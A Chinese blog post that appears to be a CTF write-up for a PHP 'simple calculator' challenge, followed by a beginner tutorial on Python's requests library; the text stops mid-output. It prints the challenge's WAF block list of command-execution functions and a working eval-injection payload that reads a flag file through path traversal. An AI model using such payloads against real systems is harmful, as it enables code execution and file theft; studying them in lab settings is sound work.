<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="https://yoyo2yong.xyz">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.zoeyctf.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="1靶机：http:&#x2F;&#x2F;47.98.234.232:8000  第一种解法对源码进行简化可得">
<meta property="og:type" content="article">
<meta property="og:title" content="简单的计算题（python脚本）">
<meta property="og:url" content="http://www.zoeyctf.top/2020/11/10/%E7%AE%80%E5%8D%95%E8%AE%A1%E7%AE%97%E5%99%A8/index.html">
<meta property="og:site_name" content="zoey">
<meta property="og:description" content="1靶机：http:&#x2F;&#x2F;47.98.234.232:8000  第一种解法对源码进行简化可得">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/1.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/2.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/3.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/4.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/5.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/6.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/7.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/8.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/9.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/10.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/11.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/12.png">
<meta property="article:published_time" content="2020-11-10T07:51:27.370Z">
<meta property="article:modified_time" content="2021-08-04T14:22:32.588Z">
<meta property="article:author" content="zoey">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/1.png">

<link rel="canonical" href="http://www.zoeyctf.top/2020/11/10/%E7%AE%80%E5%8D%95%E8%AE%A1%E7%AE%97%E5%99%A8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>简单的计算题（python脚本） | zoey</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="zoey" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">zoey</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">谷歌浏览器可正常显示图片</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://www.zoeyctf.top/2020/11/10/%E7%AE%80%E5%8D%95%E8%AE%A1%E7%AE%97%E5%99%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.jpg">
      <meta itemprop="name" content="zoey">
      <meta itemprop="description" content="请多指教！">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zoey">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          简单的计算题（python脚本）
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-11-10 15:51:27" itemprop="dateCreated datePublished" datetime="2020-11-10T15:51:27+08:00">2020-11-10</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-08-04 22:22:32" itemprop="dateModified" datetime="2021-08-04T22:22:32+08:00">2021-08-04</time>
              </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>12k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>11 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">靶机：http:&#x2F;&#x2F;47.98.234.232:8000</span><br></pre></td></tr></table></figure>

<h3 id="第一种解法"><a href="#第一种解法" class="headerlink" title="第一种解法"></a>第一种解法</h3><p>对源码进行简化可得</p>
<a id="more"></a>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function waf($str)&#123;</span><br><span class="line">    if(preg_match(&quot;&#x2F;put|sys|exec|\&#96;|\^|\%|\~\&#x2F;|passthru|popen|cat|\\|preg|ph|\&lt;\?|\&lt;|ar|un|sc|va&#x2F;is&quot;, $str))&#123;</span><br><span class="line">        die(&quot;no hack&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(isset($_GET[&#39;a&#39;]))&#123;  &#x2F;&#x2F;传入一个参数a，执行waf方法，对参数a进行过滤</span><br><span class="line">    waf($_GET[&#39;a&#39;]);</span><br><span class="line">    $payload &#x3D; preg_replace(&quot;&#x2F;;&#x2F;&quot;, &quot;&quot;, $_GET[&#39;a&#39;]);&#x2F;&#x2F;把;替换为空</span><br><span class="line">    echo $payload; </span><br><span class="line">    $go &#x3D; sprintf(&quot;\$check&#x3D;(%s&#x3D;&#x3D;%s);&quot;,100,$payload); &#x2F;&#x2F;把过滤后的值与100做比较，如果为真，则check不为0，输出U 4re right,如果为假，输出Try again!</span><br><span class="line">    echo $go;</span><br><span class="line">    eval($go);&#x2F;&#x2F;危险函数eval,利用该函数可以得到flag</span><br><span class="line">    if($check)&#123;</span><br><span class="line">        echo &quot;U 4re right&quot;;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        echo  &quot;Try again!&quot;;    </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>再一次简化为关键代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> $go = sprintf(<span class="string">&quot;\$check=(%s==%s);&quot;</span>,<span class="number">100</span>,<span class="number">100</span>);</span><br><span class="line"><span class="keyword">eval</span> ($go);</span><br></pre></td></tr></table></figure>

<p>通过修改$go的值执行eval函数</p>
<p>首先执行phpinfo()</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/1.png"></p>
<p>可以看到，我们只要在$go 后面添加and+执行语句，eval就可以执行该命令。</p>
<p>但是此函数不可在题目上进行测试，因为题目过滤了php.</p>
<p>在php网站跟目录添加一个flag文件进行测试。</p>
<p>我们可以对该flag文件进行读取并输出</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/2.png"></p>
<p>可以看到成功输出文件内容。</p>
<p>但是，题目中过滤了va，所以不能使用var_dump这个函数。想到另一个输出函数print_r</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/3.png"></p>
<p>成功执行，在题目上进行测试。</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/4.png"></p>
<p>提示在var/www/html/index.php上不存在flag文件，想到了返回上一级目录。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and print_r(readfile(&quot;..&#x2F;..&#x2F;..&#x2F;..&#x2F;flag&quot;))</span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/5.png"></p>
<p><strong>在通过python脚本获取flag之前，我们需要对python脚本有一些了解。</strong></p>
<h3 id="Python-HTTP请求"><a href="#Python-HTTP请求" class="headerlink" title="Python-HTTP请求"></a>Python-HTTP请求</h3><p>requests模块发送请求有data、params两种携带参数的方法。</p>
<p>params在get请求中使用，data在post请求中使用。</p>
<h4 id="GET请求"><a href="#GET请求" class="headerlink" title="GET请求"></a>GET请求</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">不带参数 r&#x3D;requests.get(url)</span><br><span class="line">带数  r&#x3D;requests.get(url&#x3D;url,params&#x3D;&#123;key1&#x3D;value1,key2&#x3D;value2&#125;)</span><br><span class="line"></span><br><span class="line"> r.url获取请求URL</span><br></pre></td></tr></table></figure>

<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://127.0.0.1/test.php&quot;</span></span><br><span class="line">payload = &#123;<span class="string">&#x27;username&#x27;</span>:<span class="string">&#x27;1&#x27;</span>,<span class="string">&#x27;password&#x27;</span>:<span class="string">&#x27;1&#x27;</span>,<span class="string">&#x27;submit&#x27;</span>:<span class="string">&#x27;登陆&#x27;</span>&#125;</span><br><span class="line">r=requests.get(url,params=payload)</span><br><span class="line">print(r.status_code)</span><br><span class="line">print(r.url)</span><br><span class="line">print(r.text)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">//<span class="number">200</span></span><br><span class="line">http://127.0.0.1/test.php?username=1&amp;password=1&amp;submit=%E7%99%BB%E9%99%86</span><br><span class="line">    &lt;form action=<span class="string">&quot;&quot;</span> method=<span class="string">&quot;GET&quot;</span>&gt;</span><br><span class="line"></span><br><span class="line">		&lt;p&gt;&lt;input class=&#x27;input&#x27; type=&quot;text&quot; name=&quot;username&quot; placeholder=&quot;账户&quot;&gt;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">		&lt;p&gt;&lt;input class=&#x27;input&#x27;  type=&quot;password&quot; name=&quot;password&quot; placeholder=&quot;密码&quot;&gt;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">		&lt;p&gt;&lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;登陆&quot;&gt;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">	&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<h4 id="POST请求"><a href="#POST请求" class="headerlink" title="POST请求"></a>POST请求</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">不带参数 requests.post(url)</span><br><span class="line">带参数 requests.post(url,data&#x3D;&#123;key1,value&#125;)</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://127.0.0.1/test.php&quot;</span></span><br><span class="line">data = &#123;<span class="string">&#x27;username&#x27;</span>:<span class="string">&#x27;1&#x27;</span>,<span class="string">&#x27;password&#x27;</span>:<span class="string">&#x27;1&#x27;</span>,<span class="string">&#x27;submit&#x27;</span>:<span class="string">&#x27;登陆&#x27;</span>&#125;</span><br><span class="line">r=requests.post(url,data=data)</span><br><span class="line">print(r.status_code)</span><br><span class="line">print(r.url)</span><br><span class="line">print(r.text)</span><br><span class="line">print(type(r.text))</span><br><span class="line"></span><br><span class="line">//<span class="number">200</span></span><br><span class="line">http://<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/test.php</span><br><span class="line">&lt;form action=<span class="string">&quot;&quot;</span> method=<span class="string">&quot;POST&quot;</span>&gt;</span><br><span class="line"></span><br><span class="line">		&lt;p&gt;&lt;input class=&#x27;input&#x27; type=&quot;text&quot; name=&quot;username&quot; placeholder=&quot;账户&quot;&gt;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">		&lt;p&gt;&lt;input class=&#x27;input&#x27;  type=&quot;password&quot; name=&quot;password&quot; placeholder=&quot;密码&quot;&gt;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">		&lt;p&gt;&lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;登陆&quot;&gt;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">	&lt;/form&gt;</span><br><span class="line">&lt;<span class="class"><span class="keyword">class</span> &#x27;<span class="title">str</span>&#x27;&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="自定义请求头"><a href="#自定义请求头" class="headerlink" title="自定义请求头"></a>自定义请求头</h4><p>headers = {key1:value2}</p>
<p>requests.get(url,headers=headers)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://127.0.0.1/test.php&quot;</span></span><br><span class="line">headers = &#123;<span class="string">&quot;User-Agent&quot;</span>:<span class="string">&quot;HAHA&quot;</span>&#125;</span><br><span class="line"></span><br><span class="line">r1=requests.get(url)</span><br><span class="line">print(r1.request.headers)</span><br><span class="line">r=requests.get(url,headers=headers)</span><br><span class="line">print(r.request.headers)</span><br><span class="line"></span><br><span class="line">//&#123;<span class="string">&#x27;User-Agent&#x27;</span>: <span class="string">&#x27;python-requests/2.24.0&#x27;</span>, <span class="string">&#x27;Accept-Encoding&#x27;</span>: <span class="string">&#x27;gzip, deflate&#x27;</span>, <span class="string">&#x27;Accept&#x27;</span>: <span class="string">&#x27;*/*&#x27;</span>, <span class="string">&#x27;Connection&#x27;</span>: <span class="string">&#x27;keep-alive&#x27;</span>&#125;</span><br><span class="line">&#123;<span class="string">&#x27;User-Agent&#x27;</span>: <span class="string">&#x27;HAHA&#x27;</span>, <span class="string">&#x27;Accept-Encoding&#x27;</span>: <span class="string">&#x27;gzip, deflate&#x27;</span>, <span class="string">&#x27;Accept&#x27;</span>: <span class="string">&#x27;*/*&#x27;</span>, <span class="string">&#x27;Connection&#x27;</span>: <span class="string">&#x27;keep-alive&#x27;</span>&#125;</span><br><span class="line">//用于一些题目需要修改UA头</span><br></pre></td></tr></table></figure>

<h4 id="自定义headers头"><a href="#自定义headers头" class="headerlink" title="自定义headers头"></a>自定义headers头</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;https://www.baidu.com&quot;</span></span><br><span class="line">r=requests.get(url)</span><br><span class="line">print(r.request.headers)</span><br><span class="line"></span><br><span class="line"><span class="comment">#&#123;&#x27;User-Agent&#x27;: &#x27;python-requests/2.24.0&#x27;, &#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate&#x27;, &#x27;Accept&#x27;: &#x27;*/*&#x27;, &#x27;Connection&#x27;: &#x27;keep-alive&#x27;&#125;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;https://www.baidu.com&quot;</span></span><br><span class="line">headers = &#123;<span class="string">&#x27;User-Agent&#x27;</span>:<span class="string">&#x27;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36&#x27;</span>&#125;</span><br><span class="line">r=requests.get(url,headers=headers)</span><br><span class="line">print(r.request.headers)</span><br><span class="line"></span><br><span class="line"><span class="comment">#&#123;&#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36&#x27;, &#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate&#x27;, &#x27;Accept&#x27;: &#x27;*/*&#x27;, &#x27;Connection&#x27;: &#x27;keep-alive&#x27;&#125;</span></span><br></pre></td></tr></table></figure>

<h3 id="Python-HTTP响应"><a href="#Python-HTTP响应" class="headerlink" title="Python-HTTP响应"></a>Python-HTTP响应</h3><h4 id="获取响应状态码"><a href="#获取响应状态码" class="headerlink" title="获取响应状态码"></a>获取响应状态码</h4><p><code>r_status_code</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\Administrator&gt;ipconfig</span><br><span class="line"></span><br><span class="line">Windows IP 配置</span><br><span class="line">无线局域网适配器 WLAN:</span><br><span class="line"></span><br><span class="line">   连接特定的 DNS 后缀 . . . . . . . :</span><br><span class="line">   本地链接 IPv6 地址. . . . . . . . : </span><br><span class="line">   IPv4 地址 . . . . . . . . . . . . : 192.168.xxx.xxx</span><br><span class="line">   子网掩码  . . . . . . . . . . . . : 255.255.255.0</span><br><span class="line">   默认网关. . . . . . . . . . . . . : 192.168.xxx.xxx</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://192.168.xxx.xxx/test.php&quot;</span></span><br><span class="line">r = requests.get(url)</span><br><span class="line">print(r.status_code)</span><br><span class="line"></span><br><span class="line">url1=<span class="string">&quot;http://192.168.xxx.xxx/test123.php&quot;</span></span><br><span class="line">r1 = requests.get(url1)</span><br><span class="line">print(r1.status_code)</span><br><span class="line"></span><br><span class="line">//<span class="number">200</span></span><br><span class="line"><span class="number">404</span>  （不存在页面返回<span class="number">404</span>）</span><br><span class="line">//url将<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>改写成无线局域网IPv4地址</span><br></pre></td></tr></table></figure>

<h4 id="获取响应文本"><a href="#获取响应文本" class="headerlink" title="获取响应文本"></a>获取响应文本</h4><p><code>r.content</code></p>
<p><code>r.text</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">requests对象的get和post方法都会返回一个Response对象，这个对象里面存的是服务器返回的所有信息，包括响应头，响应状态码等。其中返回的网页部分会存在.content和.text两个对象中。</span><br><span class="line"></span><br><span class="line">两者区别在于，content中间存的是字节码，而text中存的是Beautifulsoup根据猜测的编码方式将content内容编码成字符串。</span><br><span class="line"></span><br><span class="line">直接输出content，会发现前面存在b&#39;这样的标志，这是字节字符串的标志，而text是，没有前面的b,对于纯ascii码，这两个可以说一模一样，对于其他的文字，需要正确编码才能正常显示。</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://192.168.xxx.xxx/test.php&quot;</span></span><br><span class="line">r = requests.get(url)</span><br><span class="line">print(r.status_code)</span><br><span class="line">print(r.text)</span><br><span class="line">print(<span class="string">&quot;*&quot;</span>*<span class="number">50</span>)</span><br><span class="line">print(r.content)</span><br><span class="line"></span><br><span class="line">//<span class="number">200</span></span><br><span class="line">&lt;form action=<span class="string">&quot;&quot;</span> method=<span class="string">&quot;GET&quot;</span>&gt;</span><br><span class="line"></span><br><span class="line">		&lt;p&gt;&lt;input class=&#x27;input&#x27; type=&quot;text&quot; name=&quot;username&quot; placeholder=&quot;账户&quot;&gt;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">		&lt;p&gt;&lt;input class=&#x27;input&#x27;  type=&quot;password&quot; name=&quot;password&quot; placeholder=&quot;密码&quot;&gt;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">		&lt;p&gt;&lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;登陆&quot;&gt;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">	&lt;/form&gt;</span><br><span class="line">**************************************************</span><br><span class="line"><span class="string">b&#x27;&lt;form action=&quot;&quot; method=&quot;GET&quot;&gt;\r\n\t\t&lt;p&gt;&lt;input class=\&#x27;input\&#x27; type=&quot;text&quot; name=&quot;username&quot; placeholder=&quot;\xe8\xb4\xa6\xe6\x88\xb7&quot;&gt;&lt;/p&gt;\r\n\t\t&lt;p&gt;&lt;input class=\&#x27;input\&#x27;  type=&quot;password&quot; name=&quot;password&quot; placeholder=&quot;\xe5\xaf\x86\xe7\xa0\x81&quot;&gt;&lt;/p&gt;\r\n\t\t&lt;p&gt;&lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;\xe7\x99\xbb\xe9\x99\x86&quot;&gt;&lt;/p&gt;\r\n\t&lt;/form&gt;&#x27;</span></span><br></pre></td></tr></table></figure>

<h4 id="获取响应头"><a href="#获取响应头" class="headerlink" title="获取响应头"></a>获取响应头</h4><p><code>r.headers</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://192.168.xxx.xxx/test.php&quot;</span></span><br><span class="line">r = requests.get(url)</span><br><span class="line"><span class="comment">#响应头</span></span><br><span class="line">print(r.headers)</span><br><span class="line"><span class="comment">#请求头</span></span><br><span class="line">print(r.request.headers)</span><br><span class="line"></span><br><span class="line">&#123;<span class="string">&#x27;Date&#x27;</span>: <span class="string">&#x27;Fri, 06 Nov 2020 13:40:55 GMT&#x27;</span>, <span class="string">&#x27;Server&#x27;</span>: <span class="string">&#x27;Apache/2.4.23 (Win32) OpenSSL/1.0.2j 